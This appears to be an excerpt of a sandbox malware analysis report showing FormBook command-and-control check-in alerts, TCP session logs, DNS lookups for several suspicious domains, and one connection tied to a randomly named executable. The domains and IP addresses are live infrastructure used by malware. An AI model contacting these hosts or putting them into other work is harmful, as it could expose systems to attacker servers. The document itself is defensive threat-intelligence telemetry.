2025-01-11T05:44:11.998202+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49989 | 134.122.191.187 | 80 | TCP
2025-01-11T05:44:11.998202+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49989 | 134.122.191.187 | 80 | TCP
2025-01-11T05:44:18.744320+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49990 | 156.234.28.101 | 80 | TCP
2025-01-11T05:44:21.251999+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49991 | 156.234.28.101 | 80 | TCP
2025-01-11T05:44:23.801868+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49992 | 156.234.28.101 | 80 | TCP
2025-01-11T05:44:26.355978+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49993 | 156.234.28.101 | 80 | TCP
2025-01-11T05:44:26.355978+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49993 | 156.234.28.101 | 80 | TCP
2025-01-11T05:44:32.134900+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49994 | 209.74.79.42 | 80 | TCP
2025-01-11T05:44:34.685203+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49995 | 209.74.79.42 | 80 | TCP
2025-01-11T05:44:37.239559+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49996 | 209.74.79.42 | 80 | TCP
2025-01-11T05:44:39.808998+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49997 | 209.74.79.42 | 80 | TCP
2025-01-11T05:44:39.808998+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49997 | 209.74.79.42 | 80 | TCP
2025-01-11T05:44:45.380494+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49998 | 208.91.197.27 | 80 | TCP
2025-01-11T05:44:47.931578+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49999 | 208.91.197.27 | 80 | TCP
2025-01-11T05:44:50.517452+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50000 | 208.91.197.27 | 80 | TCP
2025-01-11T05:44:53.598421+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 50001 | 208.91.197.27 | 80 | TCP
2025-01-11T05:44:53.598421+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50001 | 208.91.197.27 | 80 | TCP
2025-01-11T05:44:59.537534+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50002 | 185.101.158.113 | 80 | TCP
2025-01-11T05:45:02.166501+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50003 | 185.101.158.113 | 80 | TCP
2025-01-11T05:45:04.796710+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50004 | 185.101.158.113 | 80 | TCP
2025-01-11T05:45:07.352230+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 50005 | 185.101.158.113 | 80 | TCP
2025-01-11T05:45:07.352230+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50005 | 185.101.158.113 | 80 | TCP
2025-01-11T05:45:13.012282+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50006 | 104.21.48.233 | 80 | TCP
2025-01-11T05:45:15.558939+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50007 | 104.21.48.233 | 80 | TCP
2025-01-11T05:45:18.139702+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50008 | 104.21.48.233 | 80 | TCP
2025-01-11T05:45:20.654742+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 50009 | 104.21.48.233 | 80 | TCP
2025-01-11T05:45:20.654742+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50009 | 104.21.48.233 | 80 | TCP
2025-01-11T05:45:26.366691+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50010 | 3.252.97.86 | 80 | TCP
2025-01-11T05:45:29.508511+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50011 | 3.252.97.86 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Jan 11, 2025 05:44:26.364905119 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:31.527659893 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:31.533731937 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:31.533827066 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:31.547996998 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:31.553024054 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:32.134721994 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:32.134809017 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:32.134900093 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:33.053495884 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.072626114 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.077451944 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.077549934 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.092087984 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.096899986 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.685017109 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.685137987 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.685203075 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:35.600577116 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.621793032 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.629745960 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:36.629816055 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.645860910 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.650692940 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:36.650794983 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:37.239341021 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:37.239450932 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:37.239558935 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:38.147376060 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.166574001 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.172372103 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.172508955 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.181746006 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.186603069 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.808773041 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.808907032 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.808998108 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.812061071 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.816981077 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:44.833189964 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:44.838160992 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:44.838257074 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:44.854197025 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:44.859468937 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:45.375504017 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:45.380494118 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:46.366306067 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:46.371143103 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.390352964 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:47.395260096 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.395327091 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:47.410501957 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:47.415381908 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.931416035 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.931577921 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:48.913245916 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:48.918148041 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:49.990772009 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:49.995971918 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:49.996073961 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:50.028844118 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:50.033823013 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:50.033886909 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:50.517304897 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:50.517452002 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:51.538378000 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:51.543384075 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:52.603261948 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:52.608258009 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:52.608359098 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:52.692398071 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:52.697262049 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598170042 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598210096 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598247051 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598283052 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598316908 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598421097 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.598464966 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.599433899 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599472046 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599483967 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.599550962 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599592924 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.599693060 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599729061 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599771976 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.604747057 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.604784012 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.604871988 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.642000914 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.642035007 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.642230034 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.683725119 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683758020 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683793068 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683828115 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683859110 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683909893 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.683948994 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.688215017 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.693046093 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:58.845544100 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:44:58.850517988 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:58.850641966 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:44:58.866154909 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:44:58.871268034 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:59.537334919 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:59.537467003 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:59.537533998 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:00.382103920 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.404889107 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.409934044 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:01.410093069 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.563301086 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.568233013 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:02.166234970 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:02.166431904 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:02.166501045 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:03.085222960 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.105010986 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.109999895 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.110110998 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.126224995 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.131016016 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.131227016 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.796638966 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.796677113 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.796710014 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:05.632210970 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.650481939 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.655606985 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:06.655756950 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.666766882 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.671665907 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352046013 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352071047 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352086067 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352098942 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352230072 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:07.352328062 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:07.355241060 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:07.360043049 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:12.382040024 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:12.386900902 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:12.387001991 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:12.402044058 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:12.407120943 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:13.010396004 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:13.012207031 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:13.012281895 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:13.913764954 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.933392048 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.938335896 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:14.938457012 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.956047058 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.960926056 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.557960987 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.558871031 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.558938980 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:15.559007883 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.559057951 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:16.478173018 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.495146036 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.500082016 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:17.500154018 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.516024113 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.520889997 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:17.520910978 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:18.138160944 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:18.139532089 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:18.139702082 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:19.023262024 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.043080091 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.048276901 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.048362017 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.058527946 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.063416004 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.653219938 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.654582977 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.654632092 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.654742002 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.654825926 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.659744024 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.664612055 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:25.690651894 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:25.695604086 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:25.695674896 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:25.710680962 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:25.715528965 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366406918 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366444111 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366482019 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366691113 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:27.226263046 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.809264898 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.814460993 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:28.820091009 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.833187103 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.838169098 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508373022 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508429050 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508447886 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508511066 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:29.508598089 CET5001180192.168.2.103.252.97.86
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 05:43:25.267860889 CET6501253192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:43:25.288018942 CET53650121.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:43:41.322546959 CET5078553192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:43:41.447616100 CET53507851.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:43:49.511753082 CET5690753192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:43:49.618021965 CET53569071.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:02.994678020 CET5116053192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:03.398760080 CET53511601.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:17.010364056 CET5136253192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:17.835716009 CET53513621.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:31.370593071 CET5411853192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:31.525178909 CET53541181.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:44.823456049 CET6312353192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:44.830482960 CET53631231.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:58.698283911 CET5735553192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:58.842771053 CET53573551.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:45:12.370701075 CET6089653192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:45:12.379635096 CET53608961.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:45:25.677390099 CET5066753192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:45:25.688584089 CET53506671.1.1.1192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 05:43:25.267860889 CET | 192.168.2.10 | 1.1.1.1 | 0xda13 | Standard query (0) | www.pbfgm.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:43:41.322546959 CET | 192.168.2.10 | 1.1.1.1 | 0xad86 | Standard query (0) | www.phdcoach.pro | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:43:49.511753082 CET | 192.168.2.10 | 1.1.1.1 | 0xa57f | Standard query (0) | www.elinor.club | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:02.994678020 CET | 192.168.2.10 | 1.1.1.1 | 0xbebc | Standard query (0) | www.smalleyes.icu | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:17.010364056 CET | 192.168.2.10 | 1.1.1.1 | 0x623a | Standard query (0) | www.btblxhh.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:31.370593071 CET | 192.168.2.10 | 1.1.1.1 | 0xccef | Standard query (0) | www.primespot.live | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:44.823456049 CET | 192.168.2.10 | 1.1.1.1 | 0xfdf9 | Standard query (0) | www.mohawktooldie.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:58.698283911 CET | 192.168.2.10 | 1.1.1.1 | 0x5b3e | Standard query (0) | www.graviton.energy | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:45:12.370701075 CET | 192.168.2.10 | 1.1.1.1 | 0x404e | Standard query (0) | www.ausyva4.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:45:25.677390099 CET | 192.168.2.10 | 1.1.1.1 | 0xf945 | Standard query (0) | www.e8af.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 05:43:25.288018942 CET | 1.1.1.1 | 192.168.2.10 | 0xda13 | No error (0) | www.pbfgm.xyz |  | 104.21.86.111 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:43:25.288018942 CET | 1.1.1.1 | 192.168.2.10 | 0xda13 | No error (0) | www.pbfgm.xyz |  | 172.67.218.146 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:43:41.447616100 CET | 1.1.1.1 | 192.168.2.10 | 0xad86 | Name error (3) | www.phdcoach.pro | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:43:49.618021965 CET | 1.1.1.1 | 192.168.2.10 | 0xa57f | No error (0) | www.elinor.club |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:03.398760080 CET | 1.1.1.1 | 192.168.2.10 | 0xbebc | No error (0) | www.smalleyes.icu |  | 134.122.191.187 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:17.835716009 CET | 1.1.1.1 | 192.168.2.10 | 0x623a | No error (0) | www.btblxhh.top |  | 156.234.28.101 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:31.525178909 CET | 1.1.1.1 | 192.168.2.10 | 0xccef | No error (0) | www.primespot.live |  | 209.74.79.42 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:44.830482960 CET | 1.1.1.1 | 192.168.2.10 | 0xfdf9 | No error (0) | www.mohawktooldie.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:44:58.842771053 CET | 1.1.1.1 | 192.168.2.10 | 0x5b3e | No error (0) | www.graviton.energy |  | 185.101.158.113 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:45:12.379635096 CET | 1.1.1.1 | 192.168.2.10 | 0x404e | No error (0) | www.ausyva4.top |  | 104.21.48.233 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:45:12.379635096 CET | 1.1.1.1 | 192.168.2.10 | 0x404e | No error (0) | www.ausyva4.top |  | 172.67.188.88 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:45:25.688584089 CET | 1.1.1.1 | 192.168.2.10 | 0xf945 | No error (0) | www.e8af.xyz |  | 3.252.97.86 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49980 | 104.21.86.111 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
